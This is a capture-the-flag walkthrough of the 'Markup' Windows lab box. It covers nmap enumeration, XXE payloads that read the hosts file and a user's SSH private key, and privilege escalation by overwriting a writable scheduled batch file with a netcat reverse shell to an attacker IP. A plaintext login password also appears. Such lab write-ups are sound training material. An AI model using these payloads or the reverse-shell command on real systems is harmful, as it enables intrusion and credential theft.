Skip to content

Markup

Nmap scan

Let's start with a nmap scan:

┌──(kali㉿kali)-[~]
└─$ sudo nmap <MACHINE_IP> -p- --min-rate 1000
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-15 19:15 EDT
Nmap scan report for <MACHINE_IP>
Host is up (0.26s latency).
Not shown: 65532 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 133.25 seconds
           Raw packets sent: 131160 (5.771MB) | Rcvd: 450 (88.644KB)
┌──(kali㉿kali)-[~]
└─$ sudo nmap <MACHINE_IP> -p22,80,443 -sC -sV           
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-15 19:20 EDT
Nmap scan report for <MACHINE_IP>
Host is up (0.16s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey: 
|   3072 9f:a0:f7:8c:c6:e2:a4:bd:71:87:68:82:3e:5d:b7:9f (RSA)
|   256 90:7d:96:a9:6e:9e:4d:40:94:e7:bb:55:eb:b3:0b:97 (ECDSA)
|_  256 f9:10:eb:76:d4:6d:4f:3e:17:f3:93:d6:0b:8c:4b:81 (ED25519)
80/tcp  open  http     Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28
|_http-title: MegaShopping
443/tcp open  ssl/http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28
|_http-title: MegaShopping
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.94 seconds

So we have a web server in using ports 80 and 443 and then we can see that ssh is open too. We can start enumerating that webserver.

Port 80

Since the TLS domain is localhost I will use the port 80 for the web server enumeration for now. The page is asking for login so tried the credentials we found in the last challenge: Daniel:>SNDv*2wzLWf to get access.

After some digging we can see that when an order is sent the request contains:

<?xml version = "1.0"?><order><quantity>123</quantity><item>Home Appliances</item><address>123</address></order>

So maybe the site is vulnerable to XEE, i wrote a little Python script to ease the payload sending process but basically sending this (remember is a Windows box according to nmap):

<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///C:/windows/system32/drivers/etc/hosts'>]>
<order><quantity>123</quantity><item>&read;</item><address>123</address></order>

Will make the server print the hosts file contents cool! Since ssh is open and we logged in using a user called Daniel I tried to check if i could get a private key. Using the next payload the daniel user private key is now ours!

<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///C:/Users/daniel/.ssh/id_rsa'>]>
<order><quantity>123</quantity><item>&read;</item><address>123</address></order>

In the box

After getting the user flag in the Daniel Desktop we can start enumerating. I spent a while trying some exploits and looking around until i saw a weird file called job.bat:

PS C:\Log-Management> cat .\job.bat 
@echo off                                                              
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V           
IF (%adminTest%)==(Access) goto noAdmin                                
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G") 
echo.                                                                  
echo Event Logs have been cleared!                                     
goto theEnd                                                            
:do_clear                                                              
wevtutil.exe cl %1                                                     
goto :eof                                                              
:noAdmin                                                               
echo You must run this script as an Administrator!                     
:theEnd                                                                
exit

It just clear the logs, but we can see something interesting if we check the file permissions:

PS C:\Log-Management> icacls .\job.bat
.\job.bat BUILTIN\Users:(F)
          NT AUTHORITY\SYSTEM:(I)(F)
          BUILTIN\Administrators:(I)(F)
          BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
PS C:\Log-Management> whoami /GROUPS

GROUP INFORMATION
-----------------

Group Name                             Type             SID                                           Attributes
====================================== ================ ============================================= ==================================================
Everyone                               Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
MARKUP\Web Admins                      Alias            S-1-5-21-103432172-3528565615-2854469147-1001 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users        Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                   Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192

We have full permissions over the file, since this file looks like an schedule task run by the system administrator we can abuse it to get full access.

Privilege scalation

First we have to download netcat in the box and after that we can just edit the job.bat file as:

@echo off                                                              
C:\Log-Management\nc.exe -e cmd.exe <ATACKER_IP> 8080

Now we spin up a listener and wait for the reverse shell...

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 8080
listening on [any] 8080 ...
connect to [<ATACKER_IP>] from (UNKNOWN) [<MACHINE_IP>] 51493
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

The root flag is in the Administrator's Desktop.